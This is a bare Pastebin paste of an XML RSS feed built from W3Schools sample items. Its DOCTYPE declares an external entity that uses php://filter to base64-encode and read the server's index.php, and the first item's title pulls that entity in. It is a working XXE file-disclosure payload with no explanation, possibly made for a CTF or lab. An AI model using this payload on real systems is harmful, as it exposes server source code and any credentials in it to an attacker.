Taisia_Kartamysheva

Untitled

Jun 7th, 2022 (edited)
511
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 0.64 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE passwd [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
  3. <rss version="2.0">
  4.  
  5. <channel>
  6.   <title>hello</title>
  7.   <link>https://www.w3schools.com</link>
  8.   <description>Free web building tutorials</description>
  9.   <item>
  10.     <title>&xxe;</title>
  11.     <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  12.     <description>New RSS tutorial on W3Schools</description>
  13.   </item>
  14.   <item>
  15.     <title>XML Tutorial</title>
  16.     <link>https://www.w3schools.com/xml</link>
  17.     <description>New XML tutorial on W3Schools</description>
  18.   </item>
  19. </channel>
  20.  
  21. </rss>
Add Comment
Please, Sign In to add comment